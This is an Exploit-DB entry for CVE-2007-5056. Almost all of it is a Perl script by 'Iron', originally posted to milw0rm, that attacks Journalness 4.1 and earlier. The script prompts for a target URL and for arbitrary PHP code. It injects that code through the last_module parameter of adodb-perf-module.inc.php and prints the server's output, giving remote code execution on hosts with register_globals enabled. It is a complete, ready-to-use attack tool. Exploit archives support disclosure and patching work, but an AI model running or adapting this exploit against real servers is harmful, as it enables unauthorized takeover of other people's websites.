Journalness <= 4.1 last_module Remote Code Execution Exploit

2008-02-09T00:00:00
ID EDB-ID:5091
Type exploitdb
Reporter Iron
Modified 2008-02-09T00:00:00

Description

Journalness <= 4.1 (last_module) Remote Code Execution exploit. CVE-2007-5056. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
#
#	Vendor url: journalness.sourceforge.net
#
# note: exploit requires Register_globals = On in php.ini
#							~Iron
#							http://www.randombase.com
require LWP::UserAgent;

print "#
# Journalness &lt;= 4.1 Remote Code Execution exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group & dHack
#
# Example target url: http://www.target.com/journalnessdir/
Target url?";
chomp($target=&lt;stdin&gt;);
if($target !~ /^http:\/\//)
{
	$target = "http://".$target;
}
if($target !~ /\/$/)
{
	$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=&lt;stdin&gt;);
$code =~ s/(&lt;\?php|\?&gt;|&lt;\?)//ig;
$target .= "includes/database/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};".$code."//";

$ua = LWP::UserAgent-&gt;new;
$ua-&gt;timeout(10);
$ua-&gt;env_proxy;

$response = $ua-&gt;get($target);

if ($response-&gt;is_success)
{
	print "\n"."#" x 20 ."\n";
	print $response-&gt;content;
	print "\n"."#" x 20 ."\n";
}
else
{
 die "Error: ".$response-&gt;status_line;
}

# milw0rm.com [2008-02-09]